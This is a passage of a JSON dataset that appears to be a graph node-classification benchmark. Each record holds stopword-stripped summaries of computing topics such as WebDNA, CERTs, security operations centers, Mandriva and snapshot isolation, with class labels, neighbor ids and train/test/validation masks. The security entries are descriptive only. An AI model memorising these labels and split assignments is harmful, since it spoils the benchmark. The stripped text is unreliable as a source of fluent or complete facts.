    "text": "WebDNA:webdna webdna server-side scripting interpreted language embedded database system specifically designed world wide web primary use creating database-driven dynamic web page applications released 1995 name registered trademark 1998 webdna currently maintained webdna software corporation webdna contains ram-resident database system hybrid in-memory database searching editing capabilities resilient persistent backup ram databases maintained disk webdna code interweave css html/html5 js/ajax allowing mix layout programming server-side client-side scripting instructions allow interact remote servers usually considered easy-to-learn scripting language designed webmasters webdesigners programmers looking quick results webdna made syntax uses square brackets english language example display today date web page simply insert nowiki date /nowiki within html css code want live date appear likewise nowiki time /nowiki show text specific client ip address request 'showif context used showif ipaddress =xxx.xxx.xxx.xxx text /showif webdna tags contexts commands follow similar conventions webdna syntax based simple format webdna instructions based two types parameters included many tags contexts commands example code connects whois server shows information stores permanent database according grant hulbert one pacific coast software founders webcatalog webdna began set c macros help accomplish website graphical tasks webdna evolved general-purpose server-side language special-purpose server-side language designed help create web pages sold stock photography shopping cart features searchable fixed-field database specialized fields storing stock photo information pacific coast software quickly saw value creating web programming language webcatalog began mid-1990s public debut macintosh platform name implies early development focus allowed web master store administrator migrate traditional product catalog online catalog evident 1997 1998 storebuilder webmerchant products allowed user quickly build store front online term webcatalog referred entire product term webdna referred scripting syntax around year 2000 webcatalog pacific coast software purchased smith micro software inc. smith micro software inc. changed name webcatalog webdna point became name referenced aspects product starting release webdna version 4.0 ending version 6.0a years 1999 2004 active years webdna scripting language adopted many national international names including disney chrysler kodak ben jerry pillsbury dough boy shop ncaa final four museum television radio also time development language gained contemporary tools nowiki function /nowiki nowiki scope /nowiki lend modular programming structured programming 2005 2008 perhaps various reasons including success smith micro software products webdna users began lose support smith micro webdna lost users free solutions like php mysql ultimately developers webdna revived language june 2008 formed together organized establish webdna software corporation wsc wsc purchased intellectual property webdna 2009 wsc released new webdna version 6.2 cicada december 2011 fastcgi version webdna engine released version along offering compatibility non-apache installations changes scope webdna server-wide application domain name-specific application means website owner easily install webdna specifically one domain without affecting domains may reside server",
    "neighbors": [
      865,
      8644,
      4490,
      10506,
      7022,
      5395,
      3219,
      1556
    ],
    "mask": "Test"
  },
  {
    "node_id": 10187,
    "label": 9,
    "text": "Java_Bindings_for_OpenGL:java bindings opengl java binding opengl api jsr api specification jsr 231 java platform standard edition allows use opengl java software platform also java binding opengl es api jsr 239 java platform micro edition core opengl api glu library calls available java thin wrapper looking much original opengl c api except glu nurbs routines exposed public api platform specific libraries available cgl api mac os x glx x window system wgl microsoft windows also abstracted create platform independent way selecting framebuffer attributes performing platform specific framebuffer operations platform-specific extensions included public api implementation choose export apis via gl.getplatformglextensions gl.getextension string method calls return objects whose data types specific given implementation example shows draw polygon without initialization repaint code reference c implementation translates following java implementation",
    "neighbors": [
      4960,
      3561,
      3562,
      5677,
      6797,
      823,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10188,
    "label": 3,
    "text": "Krakout:krakout krakout breakout clone released zx spectrum amstrad cpc bbc micro commodore 64 thomson computers msx platforms 1987 one wave enhanced breakout variants emerge wake arkanoid key distinctions gameplay horizontal layout allows player select acceleration characteristics bat playing written andy green rob toone published gremlin graphics music composed ben daglish 1990 dragon gave game 4 5 stars calling one favorites breakout different flavor",
    "neighbors": [
      4690,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 10189,
    "label": 4,
    "text": "ADF_Solutions:adf solutions advanced digital forensic solutions inc. adf solutions company based bethesda maryland develops tools scanning suspect computers digital devices order locate extract data process known digital forensics digital forensic tools scan mobile phones computers digital devices collect intelligence evidence crime identify computers contain content relevant investigation tools used digital forensic labs field operatives defense intelligence law enforcement border security government agencies adf produces four forensic triage tools mobile device investigator digital evidence investigator triage-g2 triage-investigator tool targets different kinds users specific scenarios triage-g2 media exploitation medex tool used computers peripheral devices typically deployed usb device military personnel working field usb devices known triage keys prepared advance field selecting specific search criteria users tool require significant technical computer skills triage-g2 currently use several u.s. defense intelligence agencies mobile device investigator provides field investigators rapid evidence collection analysis reporting ios android devices smartphones tablets recover call records messages saved contacts calendar data browsing history download history search terms wifi connections installed applications pictures videos audio files documents police investigators review analyze results immediately make on-scene decisions digital evidence investigator forensic triage tool used computers forensic examiners lab environments location scan suspect devices prioritize full examinations digital evidence investigator use law enforcement agencies worldwide triage-investigator used law enforcement investigators field scan suspect computers evidence crime like triage-g2 users minimal technical experience tool also comes usb key used create field reports developed partnership u.s. department homeland security science technology directorate software used technology employs sets search criteria known captures software allows analysts operators describe specific search exploitation want conduct also used automate recurring categories investigations shared among agencies need according technopedia.com document media exploitation defined extraction translation analysis physical digital documents media generate useful timely information also known domex similar discipline computer forensics digital forensics media exploitation",
    "neighbors": [
      7968,
      4834,
      5475,
      5284,
      2437,
      7525,
      9319,
      6475,
      11182,
      830,
      4049,
      4789,
      8635,
      2494
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10190,
    "label": 4,
    "text": "Computer_emergency_response_team:computer emergency response team computer emergency response team cert expert group handles computer security incidents alternative names groups include computer emergency readiness team computer security incident response team csirt name computer emergency response team first used 1988 cert coordination center cert-cc carnegie mellon university cmu abbreviation cert historic name picked teams around world teams took specific name csirt point task handling computer security incidents instead tech support work cmu threatening take legal action individuals organisations referred team cert-cc cert turn century cmu relaxed position terms cert csirt used interchangeably history certs linked existence malware especially computer worms viruses whenever new technology arrives misuse long following first worm ibm vnet covered shortly worm hit internet 3 november 1988 so-called morris worm paralysed good percentage led formation first computer emergency response team carnegie mellon university u.s. government contract massive growth use information communications technologies subsequent years now-generic term 'cert'/'csirt refers essential part large organisations structures many organisations cert evolves information security operations center first forum incident response security teams global association csirts",
    "neighbors": [
      8320,
      3843,
      5636,
      7059,
      3619,
      2084,
      5545,
      7337,
      7979,
      2742,
      7734,
      7739,
      2430,
      7491,
      6474,
      4689,
      10196,
      4439,
      7515,
      7522,
      612,
      101,
      10213,
      4081,
      5366,
      2041,
      3323,
      5373,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10191,
    "label": 9,
    "text": "Ypsilon_(Scheme_implementation):ypsilon scheme implementation ypsilon scheme free software implementation r6rs standard scheme implements mostly concurrent garbage collection optimized multi-core cpu systems author yoshikatsu fujita developed ypsilon implementation satisfy need real-time scheme implementation suitable computer game development without giving garbage collected dynamic interpreter",
    "neighbors": [
      1952,
      10083,
      8262,
      5612,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10192,
    "label": 2,
    "text": "Mandriva:mandriva mandriva s.a. public software company specializing linux open-source software corporate headquarters paris development centers metz france curitiba brazil mandriva s.a. developer maintainer linux distribution called mandriva linux well various enterprise software products mandriva founding member desktop linux consortium mandriva s.a. began mandrakesoft 1998 february 2004 following lengthy litigation hearst corporation name mandrake hearst corporation owned comic strip called mandrake magician mandrakesoft required change name following acquisition brazilian linux distribution conectiva february 2005 company name changed 7 april 2005 mandriva reflect names mandrakesoft conectiva october 4 2004 mandrakesoft acquired professional support company edge focused corporate market france 6 employees june 15 2005 mandriva acquired lycoris formerly redmond linux corporation october 5 2006 mandriva signed agreement acquire linbox linux enterprise software infrastructure company agreement included acquisition shares linbox total 1.739 million mandriva stock plus earn 401,000 based 2006 linbox financials 2007 mandriva reached deal government nigeria put operating system 17,000 school computers january 16 2008 mandriva turbolinux announced partnership create lab named manbo-labs share resources technology release common base system companies linux distributions although mandriva operating system eventually became significant entity data center company operating margins thin 2012 company brink bankruptcy january 30 2012 mandriva announced external entity bid rejected minority share holder deal go end first semester 2012 solution situation appeared january year found settlement achieved mandriva subsequently owned several different shareholders mandriva filed administrative receivership early 2015 liquidated may 22 2015 mandriva linux distribution continues survive openmandriva lx notable forks include mageia linux rosa linux addition selling linux distributions online store authorized resellers mandriva previously sold subscriptions mandriva club several levels membership costs ranging us 66 €60 per year 2007 €600 per year club members gained access club website additional mirrors torrents downloading free downloads boxed products depending membership level interim releases mandriva linux distribution additional software updates example gold-level higher members could download powerpack+ editions many mandriva commercial products came short-term membership club however mandriva linux completely usable without club membership mandriva linux 2008.0 released october 2007 mandriva made club membership free charge comers splitting download subscriptions separate service mandriva also mandriva corporate club larger organizations",
    "neighbors": [
      7555,
      7685,
      4230,
      1032,
      6680,
      10780,
      6302,
      10022,
      9646,
      1455,
      9902,
      823,
      2239,
      10308,
      10694,
      3162,
      10606,
      6525,
      6910,
      2559
    ],
    "mask": "Test"
  },
  {
    "node_id": 10193,
    "label": 1,
    "text": "Oracle_TopLink:oracle toplink oracle toplink mapping persistence framework java developers toplink produced oracle part oracle oracleas weblogic oc4j servers object-persistence object-transformation framework toplink provides development tools run-time functionalities ease development process help increase functionality persistent object-oriented data stored relational databases helps build high-performance applications storing data either xml extensible markup language relational databases made possible transforming object-oriented data rich user-interface possible toplink help toplink mapping workbench mapping workbench makes possible carry following ease oracle jdeveloper ide provides easy integration functionalities provided mapping workbench use toplink users stay focused primary cause let toplink handle integration persistence object transformation application designing implementing deploying process accelerated toplink supports variety data sources formats relational database object-relational database enterprise information system eis xml many others toplink originally developed object people smalltalk ported java 1996-1998 called toplink java 2002 toplink acquired oracle corporation developed oracle fusion middleware product toplink code donated eclipse foundation eclipselink project born 2007 eclipselink provides functionality toplink sun microsystems selected eclipselink march 2008 implementation jpa 2.0 jsr 317 reference number versions toplink released since latest version 12c 12.1.3 available free download runtime component toplink provided eclipselink core api provides direct access runtime embedded application persistence behavior enabled making application calls invoke eclipselink api perform functionalities provides safe access shared databases import following class use extended functionality eclipselink binding java classes xml schemas possible help object-xml eclipselink component implementing jaxb mapping information provided annotations also provides manipulation xml service data objects sdo provides use sdo api use dynamic objects customize manipulate xml use static data objects conversion xml schema database web services dbws facilitates access relational databases help web service database access made without need write java code xml soap messages databases connected runtime component dbws uses eclipselink toplink grid integration mechanism provides connection oracle coherence eclipselink application generally interacts relational database primary database toplink application store data coherence grid called jpa grid toplink grid functionality used user license oracle coherence functionality provided get support toplink grid eclipselink users also need import following package classes database operations like insert update delete also performed toplink changes made database reflected oracle coherence cache java persistence api entity persistence class using toplink number performance features writing large amounts data implemented batch writing stored procedure support parameter binding statement ordering features offered satisfy database constraints basic operations entitymanager method persist object entity used add instance marks insertion database completion transaction codice_1 data inserted database updating entity means simply reading transaction updating properties entity updating employee lastname done follows deleting entity opposite insertion one using codice_2 method entitymanager.the entitymanager method codice_3 deletes entity completion transaction users use tools market use toplink along following toots provide special integration toplink",
    "neighbors": [
      4358,
      4614,
      4233,
      910,
      11030,
      10526,
      9471,
      5031,
      1579,
      5677,
      9389,
      7983,
      10413,
      7475,
      6074,
      10683,
      7485,
      6334,
      5567,
      7742,
      9665,
      6338,
      9286,
      6860,
      3920,
      4944,
      5460,
      479,
      4960,
      1250,
      2658,
      7523,
      3560,
      3561,
      3562,
      5612,
      7022,
      3952,
      5872,
      9078,
      10486,
      3705,
      1146,
      9467,
      3710,
      6143
    ],
    "mask": "Train"
  },
  {
    "node_id": 10194,
    "label": 7,
    "text": "Dimension_Data:dimension data dimension data company specialising information technology services based johannesburg south africa company maintains operations every inhabited continent dimension data focuses services including consulting technical support services managed services company official technology partner tour de france vuelta españa also sponsors team name 2010 company fully acquired nippon telegraph telephone ntt 1 july 2019 dimension data operations excluding middle east africa became part ntt ltd. dimension data founded 1983 keith mclachlan werner sievers jeremy ord peter neale kevin hamilton company listed johannesburg stock exchange 15 july 1987 jeremy ord appointed company executive chairman year position continued hold 2016 1991 company became official south african distributor cisco systems 1993 company expanded botswana 1995 1997 began expansion asia pacific region 1996 dimension data purchased 45 stake australian company comtech would later buyout company fully 2000 company also bought stake south african company internet solutions 1996 dimension data would increase stake company following year also 1997 company purchased majority stakes merchants group datacraft 1998 2000 company focused expansion efforts northern hemisphere investing acquiring variety companies europe united kingdom united states one acquisition 1998 purchase london-based telecommunications company plessey 31 july 2000 dimension data listed london stock exchange raising 1.25 billion process 2003 company revenue jumped 2 billion 2004 brett dawson appointed ceo company jeremy ord appointed group executive chairman next 6 years company expanded africa middle east south america september 2009 company annual revenue around 4 billion july 2010 dimension data acquired nippon telegraph telephone ntt £2.1 billion 3.2 billion october year ntt announced dimension data would delisted johannesburg stock exchange london stock exchange end year next years dimension data continued acquiring integrating businesses like opsource nextiraone oakton june 2016 brett dawson stepped ceo replaced coo jason goodall time dimension data maintained 31,000 staff 58 countries across 6 inhabited continents annual revenue company 7.5 billion 1 july 2019 majority dimension data became part ntt ltd. along ntt security ntt communications however brand continues operate middle east africa grant bodley ceo dimension data current subsidiaries include accesskenya group alwayson continuitysa e2y commerce earthwave euricom internet solutions jq network merchants nexus oakton plessey security assessment sql services training partners viiew early acquisitions included australian companies comtech internet solutions 1996 merchants datacraft acquired year later 2000 company purchased plessey joint venture worldwide african investment holdings sql services acquired 2008 nippon telegraph telephone purchased company 2010 dimension data began adding subsidiaries fold include e2y commerce award-winning digital experience commerce marketplace consultancy sap cx hybris mirakl earthwave information communications technology specialist based australia cosuses cybersecurity umbrella dimension data 2013 accesskenya nexus 2014 nexus acquisition nearly doubled dimension data presence united states dimension data subsidiaries like alwayson continuitysa first acquired fellow subsidiary internet solutions dimension data provides information technology products services data centers security network integration converged communications microsoft support company placing primary focus four service areas include digital infrastructure hybrid cloud workspaces tomorrow cybersecurity addition offering sale physical data centers provides operation management transformation relocation data centers dimension data also manages operates servers storage provides backup services case damage disaster 2016 association amaury sports organization dimension data overhauled digital infrastructure tour de france company added big data upgrades allowed new technologies like data capture race coordination improved graphics analytics dimension data provides public private cloud computing servers also offer hybrid cloud customers choose resources public private data stored customer servers dimension data servers company operates locations including johannesburg sydney london dimension data provides cybersecurity businesses enterprise scale includes infrastructure security governance compliance risk assessment variety cybersecurity services also offers services mobile security data leakage prevention march 2013 dimension data named leader green quadrant® sustainable technology services report verdantix dimension data named along seven companies dedicated sustainability practice wide range capabilities strong track record corporate sustainability april 2015 dimension data honored three separate cisco partner year awards three different regions following year company 2016 microsoft country partner year award rwanda tanzania regions along communications partner year cloud productivity partner year global arena 3 may 2015 amaury sports organisation aso signed five-year deal dimension data dimension data official technology partner cycling events part deal dimension data provides telemetrics including gps positioning speed real time september 2015 company also became sponsor former mtn-qhubeka becoming team dimension data qhubeka",
    "neighbors": [
      6834,
      4194,
      3405
    ],
    "mask": "None"
  },
  {
    "node_id": 10195,
    "label": 4,
    "text": "List_of_data-erasing_software:list data-erasing software list utilities performing data erasure",
    "neighbors": [
      4032,
      1475,
      3972,
      8997,
      2534,
      10149,
      11368,
      7369,
      11695,
      7090,
      9086,
      5492,
      10101,
      823,
      3323,
      6494,
      831
    ],
    "mask": "Test"
  },
  {
    "node_id": 10196,
    "label": 4,
    "text": "Information_security_operations_center:information security operations center information security operations center isoc soc facility enterprise information systems web sites applications databases data centers servers networks desktops endpoints monitored assessed defended soc related people processes technologies provide situational awareness detection containment remediation threats soc handle behalf institution company threatening incident ensure properly identified analyzed communicated investigated reported soc also monitors applications identify possible cyber-attack intrusion event determines genuine malicious threat incident could affect business establishing operating soc expensive difficult organisations need good reason may include security operations center soc also called security defense center sdc security analytics center sac network security operations center nsoc security intelligence center cyber security center threat defense center security intelligence operations center sioc canadian federal government term infrastructure protection center ipc used describe soc socs typically based around security information event management siem system aggregates correlates data security feeds network discovery vulnerability assessment systems governance risk compliance grc systems web site assessment monitoring systems application database scanners penetration testing tools intrusion detection systems ids intrusion prevention system ips log management systems network behavior analysis cyber threat intelligence wireless intrusion prevention system firewalls enterprise antivirus unified threat management utm siem technology creates single pane glass security analysts monitor enterprise soc staff includes analysts security engineers soc managers seasoned networking professionals usually trained computer engineering cryptography network engineering computer science may credentials cissp giac soc staffing plans range eight hours day five days week 8x5 twenty four hours day seven days week 24x7 shifts include least two analysts responsibilities clearly defined large organizations governments may operate one soc manage different groups information communication technology provide redundancy event one site unavailable soc work outsourced instance using managed security service term soc traditionally used governments managed computer security providers although growing number large corporations organizations also centers soc network operations center noc complement work tandem noc usually responsible monitoring maintaining overall network infrastructure primary function ensure uninterrupted network service soc responsible protecting networks well web sites applications databases servers data centers technologies likewise soc physical security operations center coordinate work together physical soc facility large organizations security staff monitor control security officers/guards alarms cctv physical access lighting vehicle barriers etc every soc role three different focus areas soc may active combined combination cases soc noc physical soc may housed facility organizationally combined especially focus operational tasks soc originates cert organisation focus usually monitoring control case soc operates independently noc maintain separation duties typically larger organizations maintain separate soc ensure focus expertise soc collaborates closely network operations physical security operations socs usually well protected physical electronic computer personnel security centers often laid desks facing video wall displays significant status events alarms ongoing incidents corner wall sometimes used showing news weather tv channel keep soc staff aware current events may affect information systems security engineer security analyst may several computer monitors desk processes procedures within soc clearly spell roles responsibilities well monitoring procedures processes include business technology operational analytical processes lay steps taken event alert breach including escalation procedures reporting procedures breach response procedures cloud security operations center cloudsoc may set monitor cloud service use within enterprise keep shadow problem control parse audit infrastructure application logs via siem technologies machine data platforms logrhythm splunk ibm qradar arctic wolf networks assuria hp arcsight cybershark elastica provide alerts details suspicious activity smart soc security operations center comprehensive technology agnostic cybersecurity solution utilizes leading-edge technology tools highly skilled experienced human talent composed cyber intelligence gatherers analysts security experts proactive cyberwarfare principles prevent neutralize threats organization ’ digital infrastructure assets data addition many commonly referenced terms related original isoc title including following",
    "neighbors": [
      10307,
      11429,
      2090,
      2539,
      4490,
      7228,
      10190,
      5010,
      11507,
      4471,
      9688,
      11611,
      1980,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10197,
    "label": 2,
    "text": "License_Program_Product:license program product license program product lpp aix terminology referring complete software product collection including one packages filesets",
    "neighbors": [
      7217,
      5067,
      4309
    ],
    "mask": "Train"
  },
  {
    "node_id": 10198,
    "label": 9,
    "text": "Io_(programming_language):io programming language io pure object-oriented programming language inspired smalltalk self lua lisp act1 newtonscript io prototype-based object model similar ones self newtonscript eliminating distinction instance class like smalltalk everything object uses dynamic typing like lisp programs data trees io uses actors concurrency remarkable features io minimal size openness using external code resources io executed small portable virtual machine language created steve dekorte 2002 trying help friend dru nelson language cel found really n't know much languages worked set write tiny language understand problems better io goal explore conceptual unification dynamic languages tradeoffs tend favor simplicity flexibility performance simplest form composed single identifier assuming dostuff method called zero arguments result explicit parentheses required dostuff arguments would look like io message passing language since everything io message excluding comments message sent receiver example demonstrates well fully describe point better let look next example example demonstrates message passing io version message sent system object operators special case syntax cut-and-dried examples io parser intercepts set operators defined interpreter translates method calls example following translates see also little bit operator precedence happening precedence levels c precedence levels operators also turned method calls fact operators io methods fact require explicit parentheses convenience io two ways creating anonymous functions methods blocks almost identical except scope blocks lexical scope methods dynamic scope method block higher-order functions ubiquitous hello world program new objects created cloning objects io specifically new empty object created differences parent stored within new object behavior known differential inheritance example behavior shown simple non-recursive factorial function io assignment codice_1 codice_2 last action taken function implicitly returns result explicit return expression needed demonstrates usage ranges n't use codice_3 loop would faster",
    "neighbors": [
      2304,
      9345,
      5255,
      6536,
      9224,
      10510,
      6160,
      5783,
      541,
      5029,
      4777,
      7347,
      1591,
      10819,
      8262,
      11219,
      7513,
      11226,
      4069,
      6502,
      9960,
      8041,
      8554,
      11625,
      8430,
      2804,
      10228,
      2556
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10199,
    "label": 3,
    "text": "Apple_A7:apple a7 apple a7 64-bit system chip soc designed apple inc first appeared iphone 5s introduced september 10 2013 apple states twice fast twice graphics power compared predecessor apple a6 first 64-bit arm cpu first ship consumer smartphone tablet computer software updates systems using chip cease late 2019 ios 13 support iphone 5s ipados 13 support ipad air mini 2 3 a7 features apple-designed 64-bit 1.3–1.4 ghz armv8-a dual-core cpu called cyclone 64-bit a64 instruction set armv8-a architecture doubles number registers a7 compared armv7 architecture used a6 31 general purpose registers 64-bits wide 32 floating-point/neon registers 128-bits wide a7 also integrates graphics processing unit gpu anandtech believes powervr g6430 four cluster configuration a7 per-core l1 cache 64 kb data 64 kb instructions l2 cache 1 mb shared cpu cores 4 mb l3 cache services entire soc a7 includes new image processor feature originally introduced a5 used functionality related camera image stabilizing color correction light balance a7 also includes area called secure enclave stores protects data touch id fingerprint sensor iphone 5s ipad mini 3 speculated security data secure enclave enforced arm trustzone/securcore technology change apple a6 a7 soc longer services accelerometer gyroscope compass order reduce power consumption functionality moved new m7 motion coprocessor appears separate arm-based microcontroller nxp semiconductors apple uses apl0698 variant a7 chip running 1.3 ghz iphone 5s ipad mini 2 ipad mini 3 a7 manufactured samsung high-κ metal gate hkmg 28 nm process chip includes 1 billion transistors die 102 mm size according abi research a7 drew 1100 fixed point operations 520 floating point operations predecessor a6 processor iphone 5 drew 485 320 manufactured package package pop together 1 gb lpddr3 dram 64-bit wide memory interface onto package apple uses apl5698 variant a7 chip running 1.4 ghz,1.4 ipad air die identical size layout first a7 manufactured samsung however unlike first version a7 a7 used ipad air pop stacked ram instead uses chip-on-board mounting immediately adjacent dram covered metallic heat spreader similar apple a5x a6x a7 branch predictor claimed infringe 1998 patent october 14 2015 district judge found apple guilty infringing u.s. patent table based data speculation circuit parallel processing computer apple a7 a8 processors patent owned wisconsin alumni research foundation warf firm affiliated university wisconsin july 24 2017 apple ordered pay warf 506 million patent infringement apple filed appellate brief october 26 2017 u.s. court appeals federal circuit argued apple infringe patent owned wisconsin alumni research foundation september 28 2018 ruling overturned appeal award thrown u.s. federal circuit court appeals patent expired december 2016 images illustrations",
    "neighbors": [
      9732,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      8231,
      6186,
      4139,
      7211,
      8237,
      9774,
      2097,
      8250,
      1083,
      8253,
      10813,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      8812,
      6258,
      10357,
      10361,
      4220,
      10365,
      638,
      6783,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      7833,
      666,
      5786,
      4258,
      7842,
      7844,
      4773,
      2735,
      9911,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      4807,
      4810,
      1744,
      4821,
      3286,
      3293,
      9952,
      2788,
      3301,
      6884,
      1772,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      6415,
      10512,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      9022,
      1346,
      8003,
      10562,
      6981,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      1945,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9638,
      8109,
      10675,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      8665,
      2524,
      9182,
      2023,
      10734,
      5616,
      6130,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 10200,
    "label": 7,
    "text": "Sun_Cloud:sun cloud sun cloud on-demand cloud computing service operated sun microsystems prior acquisition oracle corporation sun cloud compute utility provided access substantial computing resource internet us 1 per cpu-hour launched sun grid march 2006 based supported open source technologies solaris 10 sun grid engine java platform sun cloud delivered enterprise computing power resources internet enabling developers researchers scientists businesses optimize performance speed time results accelerate innovation without investment infrastructure early 2010 oracle announced discontinuing sun cloud project since sunday march 7 2010 network.com web site inaccessible typical application could run compute utility fit following parameters resources collections files contain user data executable jobs compute utility concept define elements unit work submitted sun cloud compute utility major elements job include name shell script controlling program execution required arguments shell script list resources must place job run run specific instantiation job description submitted sun cloud compute utility runs occur job submitted compute utility execution job one submits runs cloud sun cloud cpu usage aggregated rounded nearest whole hour example job used 1000 cpus one minute would aggregated 1000 cpu minutes 16.67 cpu hours software rounds 17 hours job would billed us 17 march 13 2007 sun announced launch application catalog online service allows developers isvs develop publish applications enabling communities scientists academics life sciences education engineering fields accelerate innovation complete research projects quickly less expensively network.com application catalog gives users immediate online access popular isv open-source applications easy-to-use web portal contractual obligation users upload run applications create personal library favorites take advantage pre-installed configured applications giving instant productivity portal gives everything need conduct analysis complete complex computational tasks help speed scientific discovery shorten time market new products simply select application upload data get results fast network.com enables anyone publish applications application catalog take advantage powerful solaris 10-based cloud platform users publish applications private library access whenever want also share applications others retaining data securely private space applications available catalog include category examples types suitable applications include",
    "neighbors": [
      9731,
      4623,
      10789,
      9766,
      5159,
      5677,
      3121,
      7248,
      597,
      10327,
      4194,
      11363,
      5732,
      5233,
      9333,
      631,
      2170,
      9343,
      4235,
      4236,
      10893,
      10387,
      2710,
      6307,
      1707,
      3247,
      6322,
      7352,
      4289,
      6338,
      10436,
      5830,
      1224,
      6856,
      3285,
      6367,
      9955,
      3819,
      5872,
      253,
      8446,
      3328,
      1801,
      1809,
      2328,
      4377,
      8986,
      8994,
      1316,
      6444,
      8495,
      2871,
      5956,
      8007,
      8520,
      4429,
      2895,
      1362,
      5471,
      4960,
      10090,
      11626,
      7022,
      1399,
      11129,
      5499,
      11646,
      911,
      1935,
      8592,
      2965,
      7072,
      2496,
      7104,
      9665,
      1480,
      9682,
      467,
      7148,
      7660,
      8179
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10201,
    "label": 1,
    "text": "Snapshot_isolation:snapshot isolation databases transaction processing transaction management snapshot isolation guarantee reads made transaction see consistent snapshot database practice reads last committed values existed time started transaction successfully commit updates made conflict concurrent updates made since snapshot snapshot isolation adopted several major database management systems interbase firebird oracle mysql postgresql sql anywhere mongodb microsoft sql server 2005 later main reason adoption allows better performance serializability yet still avoids concurrency anomalies serializability avoids always practice snapshot isolation implemented within multiversion concurrency control mvcc generational values data item versions maintained mvcc common way increase concurrency performance generating new version database object time object written allowing transactions read operations several last relevant versions object snapshot isolation used criticize ansi sql-92 standard definition isolation levels exhibits none anomalies sql standard prohibited yet serializable anomaly-free isolation level defined ansi spite distinction serializability snapshot isolation sometimes referred serializable oracle transaction executing snapshot isolation appears operate personal snapshot database taken start transaction transaction concludes successfully commit values updated transaction changed externally since snapshot taken write-write conflict cause transaction abort write skew anomaly two transactions t1 t2 concurrently read overlapping data set e.g values v1 v2 concurrently make disjoint updates e.g t1 updates v1 t2 updates v2 finally concurrently commit neither seen update performed system serializable anomaly would impossible either t1 t2 would occur first visible contrast snapshot isolation permits write skew anomalies concrete example imagine v1 v2 two balances held single person phil bank allow either v1 v2 run deficit provided total held never negative i.e v1 v2 ≥ 0 balances currently 100 phil initiates two transactions concurrently t1 withdrawing 200 v1 t2 withdrawing 200 v2 database guaranteed serializable transactions simplest way coding t1 deduct 200 v1 verify v1 v2 ≥ 0 still holds aborting t2 similarly deducts 200 v2 verifies v1 v2 ≥ 0 since transactions must serialize either t1 happens first leaving v1 100 v2 100 preventing t2 succeeding since v1 v2 200 200 t2 happens first similarly prevents t1 committing database snapshot isolation mvcc however t1 t2 operate private snapshots database deducts 200 account verifies new total zero using account value held snapshot taken since neither update conflicts commit successfully leaving v1 v2 100 v1 v2 200 systems built using multiversion concurrency control mvcc may support snapshot isolation allow transactions proceed without worrying concurrent operations importantly without needing re-verify read operations transaction finally commits convenient mvcc maintains series recent history consistent states information must stored transaction list updates made scanned conflicts fairly easily committed however mvcc systems marklogic use locks serialize writes together mvcc gain performance gains still support stronger serializability level isolation potential inconsistency problems arising write skew anomalies fixed adding otherwise unnecessary updates transactions order enforce serializability property example materialize conflict adding new table makes hidden constraint explicit mapping person total balance phil would start total balance 200 transaction would attempt subtract 200 creating write-write conflict would prevent two succeeding concurrently however approach violates normal form alternatively promote one transaction reads write instance t2 could set v1 v1 creating artificial write-write conflict t1 preventing two succeeding concurrently solution may always possible general therefore snapshot isolation puts problem maintaining non-trivial constraints onto user may appreciate either potential pitfalls possible solutions upside transfer better performance snapshot isolation called serializable mode oracle postgresql versions prior 9.1 may cause confusion real serializability mode arguments decision clear users must aware distinction avoid possible undesired anomalous behavior database system logic snapshot isolation arose work multiversion concurrency control databases multiple versions database maintained concurrently allow readers execute without colliding writers system allows natural definition implementation isolation level interbase later owned borland acknowledged provide si rather full serializability version 4 likely permitted write-skew anomalies since first release 1985 unfortunately ansi sql-92 standard written lock-based database mind hence rather vague applied mvcc systems berenson et al wrote paper 1995 critiquing sql standard cited snapshot isolation example isolation level exhibit standard anomalies described ansi sql-92 standard yet still anomalous behaviour compared serializable transactions 2008 cahill et al showed write-skew anomalies could prevented detecting aborting dangerous triplets concurrent transactions implementation serializability well-suited multiversion concurrency control databases adopted postgresql 9.1 referred serializable snapshot isolation abbreviated ssi used consistently eliminates need workarounds downside snapshot isolation increase aborted transactions perform better worse snapshot isolation workarounds depending workload 2011 jimenez-peris et al filed patent shown possible scale many millions update transactions per second new method attaining snapshot isolation distributed manner method based observation becomes possible commit transactions fully parallel without coordination therefore removing bottleneck traditional transactional processing methods method uses commit sequencer generates commit timestamps snapshot server advances current snapshot gaps filled serialization order method base database leanxcale first implementation method made 2010 part cumulonimbo european project",
    "neighbors": [
      10048,
      3398,
      9389,
      7022,
      10413,
      2901,
      7446,
      11030,
      3096,
      5658,
      8539,
      3004,
      4861,
      7581
    ],
    "mask": "Test"
  },
  {
    "node_id": 10202,
    "label": 2,
